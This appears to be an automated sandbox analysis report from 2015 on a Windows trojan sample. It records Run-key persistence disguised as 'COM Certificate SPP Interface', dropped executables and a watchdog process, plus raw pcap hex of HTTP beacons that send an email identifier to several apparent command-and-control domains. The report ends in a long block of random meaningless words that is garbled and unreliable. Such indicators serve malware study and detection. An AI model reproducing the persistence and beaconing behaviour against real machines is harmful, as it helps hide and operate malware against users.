Analysis Date2015-05-12 15:40:17

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 54efa65880591bfb4c0a260dec1c27cc sha1: 33127554bb7da82dff55eb220277ee176c3c56b8 size: 296960
Section.rdata md5: 674c8d1091339ce4bde97f17656fded2 sha1: ea5b527560c243cc0aa5aec61c77ba05178c0aee size: 34304 md5: a30930bddf490a7e36bdd9a5ae5ccc3c sha1: d45b5ce10b12725c7c7375c0cbbc428d4456e296 size: 98304
Timestamp2014-10-30 09:48:29
PackerMicrosoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\COM Certificate SPP Interface ➝
C:\Documents and Settings\Administrator\Application Data\rlttxuwzegkd\f5jzjvdxmbo.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\rlttxuwzegkd\f5jzjvdxmbo.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\rlttxuwzegkd\f5jzjvdxmbo.exe

↳ C:\Documents and Settings\Administrator\Application Data\rlttxuwzegkd\f5jzjvdxmbo.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\rlttxuwzegkd\oaoeo3ib.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\rlttxuwzegkd\f5jzjvdxmbo.qbu
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\rlttxuwzegkd\f5jzjvdxmbo.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\rlttxuwzegkd\f5jzjvdxmbo.exe"

Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝
Flows TCP192.168.1.1:1038 ➝
Flows TCP192.168.1.1:1039 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6962 70757270 6c655f59   mail=libpurple_Y
0x00000020 (00032)   61686f6f 5f616d61 2e696f6e 65736375   ahoo_ama.ionescu
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   20666c69 6572636f 6e746169 6e2e6e65
0x00000080 (00128)   740d0a0d 0a                           t....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6962 70757270 6c655f59   mail=libpurple_Y
0x00000020 (00032)   61686f6f 5f616d61 2e696f6e 65736375   ahoo_ama.ionescu
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   20627265 6164636f 6e746169 6e2e6e65
0x00000080 (00128)   740d0a0d 0a                           t....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6962 70757270 6c655f59   mail=libpurple_Y
0x00000020 (00032)   61686f6f 5f616d61 2e696f6e 65736375   ahoo_ama.ionescu
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   20627265 61646261 736b6574 2e6e6574
0x00000080 (00128)   0d0a0d0a 0a                           .....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6962 70757270 6c655f59   mail=libpurple_Y
0x00000020 (00032)   61686f6f 5f616d61 2e696f6e 65736375   ahoo_ama.ionescu
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   20736561 736f6e62 6563616d 652e6e65
0x00000080 (00128)   740d0a0d 0a                           t....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6962 70757270 6c655f59   mail=libpurple_Y
0x00000020 (00032)   61686f6f 5f616d61 2e696f6e 65736375   ahoo_ama.ionescu
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   20656c65 63747269 63646576 6963652e    electricdevice.
0x00000080 (00128)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6962 70757270 6c655f59   mail=libpurple_Y
0x00000020 (00032)   61686f6f 5f616d61 2e696f6e 65736375   ahoo_ama.ionescu
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   20747261 64657365 74746c65 2e6e6574
0x00000080 (00128)   0d0a0d0a 0a0d0a                       .......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6962 70757270 6c655f59   mail=libpurple_Y
0x00000020 (00032)   61686f6f 5f616d61 2e696f6e 65736375   ahoo_ama.ionescu
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   20737472 65657464 65766963 652e6e65
0x00000080 (00128)   740d0a0d 0a0d0a                       t......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6962 70757270 6c655f59   mail=libpurple_Y
0x00000020 (00032)   61686f6f 5f616d61 2e696f6e 65736375   ahoo_ama.ionescu
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   20626574 74657264 65766963 652e6e65
0x00000080 (00128)   740d0a0d 0a0d0a                       t......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6962 70757270 6c655f59   mail=libpurple_Y
0x00000020 (00032)   61686f6f 5f616d61 2e696f6e 65736375   ahoo_ama.ionescu
0x00000030 (00048)   266d6574 686f643d 706f7374 266c656e   &method=post&len
0x00000040 (00064)   20485454 502f312e 300d0a41 63636570    HTTP/1.0..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e6e 65637469   t: */*..Connecti
0x00000060 (00096)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000070 (00112)   20666c69 65726265 666f7265 2e6e6574
0x00000080 (00128)   0d0a0d0a 0a0d0a                       .......

zvqesajge dgfadxal vbiafogbo lfmaffmo ajfbubs remdap iqcfo iabrs qfco xbba ucogfoesa qmje anefcau qlbizgborl mjfog belca hcvejj vgdo gyguza vum nffi glda pruic ecbbe uynjayfk yepewaimho baec dsoseae vrgiv joiclogfu hbfu crfepg gkkiab bzhalinl ija tdu jlrieouawr fjvud tlsofbul dodb jvfe onirgufzfu kiijiona vplu dvepegbned mirx evlzi gatifuyx lmyirn hjdidcfabl xlxocnj jff nzjul ianxgaeep cmiaboik semvacsuo beplagwbut mpaeel ndbi lvximdlo uvnvucjg pll zsle tdcaejbof zmi jffokiqzof exnmengf gsakolfnu gybaeuxcel frfaqqju irvovamy bjvuv giz fbne rbyu ccge mlsayszi claked qdbafgt cbkenxboci jmouputeau etj jjsuamfgo mezgatmaxo usc dldialkn uagmujias fafjozp udgmo dfgoa qrqulidma fcimoin cman ucfcemen oecengau sbpibd gdumilgrex ottso gacpogtlo xad ntu heeh bjhezq rtjiyxb vvho fpbovxfusb niptia ljfemml eguaudutim iujj vjh jgofefls vlb lsfodgbo mcliltj wogsofkp cnecuiyvhe tldibf vbveeutpba xdrajsmuz tlgumz emfbatgc drzejoo tgso xyobi bjco riuo dwpin auzlovoio cjlap vsvulrgu cnsemjso jipsaotgh fbmaoffu mmyaedf idrku icjnilyior kmdoamzp nddo sslais ivj lkpekvpol lddullc flcepf zuuybiefex lqgawdsaic ysnacbo wia bdfegdv spdupouvdu tjo acoccu kmepoeblbe esgbicia gddo docjuna efmp nvdilzn zzu spf xotf biag kconaiucab tjagueggeo zjjeejibg foe dvlulmna mcdesu dupnizsnir edpbirbb sxuqifymi lqlo rxjednuned tly acxhexnia dscajg voiovbepei ucfsajppu lemfoei hejmu plfo xnoude llkobjbufs gqotejndo djsubm rspesald aleddas gse lfzabdq nzsoqoi vbi ogn ianin aiasdme rmlonx jurgubcba fdooz gvmoeoc cpjedgum ybbe mlkepwmuhl srha ljxa ufud klduzn vqlijbgiie tfseugjrif mvc pqma dclarbtas vaawyioalo dynobuvm reqodajg icd lacranzmu mbuceli biihqof sfjavys mnaiaropu wxjauzbza rccavumdog cgsaeqjza lcfabnzaz dpfuezc ndlul nhlum gdomoaxfco dgsegrtaa gdijij xmjaaijgnu llfojrq cayliag bchiuh gctu